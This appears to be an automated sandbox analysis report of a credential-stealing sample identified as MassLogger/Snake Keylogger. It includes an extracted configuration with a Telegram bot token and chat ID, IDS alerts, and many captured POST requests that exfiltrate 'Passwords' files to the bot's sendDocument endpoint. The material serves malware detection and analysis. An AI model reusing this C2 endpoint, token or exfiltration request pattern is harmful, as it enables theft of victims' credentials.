Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45

Function 00406D91 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45

Function 00406EAF Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45

Function 00406DFB Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45

Function 00405E43 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98

Source: 00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
Source: 6ZoBPR3isG.exe.8068.3.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9A700 CryptUnprotectData,		3_2_36B9A700
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9AE39 CryptUnprotectData,		3_2_36B9AE39

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50006 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:49992 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:49983 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50006 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:49983 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:49992 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50000 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50000 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50012 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50038 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50012 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:49998 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50052 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:49998 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50068 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50058 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50068 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50022 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50050 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50058 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50038 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50052 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50050 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50022 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50014 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50014 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:49990 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50030 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50030 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:49981 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50036 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50004 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:49981 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50036 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:49990 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50004 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50018 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50018 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:49994 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50032 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:49994 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50032 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:49988 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50070 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50070 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50034 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:49986 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50044 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:49986 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50044 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50034 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:49988 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50010 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50054 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50054 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50010 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50042 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50040 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50042 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50008 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50008 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50040 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50002 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50002 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:49996 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:49996 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50016 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50060 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50016 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50060 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50024 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50024 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50056 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50056 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50072 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50062 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50062 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50072 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50020 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50064 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50020 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50064 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50048 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50028 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50048 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50028 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50046 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50046 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50026 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50026 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50066 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50066 -> 149.154.167.220:443

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd319443444d0bHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31aa95a100c4Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31c0d732686bHost: api.telegram.orgContent-Length: 1090
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31d7081d0af9Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31e63d9f7e32Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31fc4d4fd6e7Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3210ec87651fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3222bf0eb193Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32389e6415d8Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd324d101c9dc9Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd326016923807Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3275c3beec6fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd328cb97b4bfdHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd329f93438a7aHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32b3b773e5e7Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32c3c9fc6045Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32d7d284421eHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32ebcbf40f9aHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32fe62e3e93fHost: api.telegram.orgContent-Length: 1090
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33123f8d9267Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3324bc118176Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33387c549528Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd334ade3c8869Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
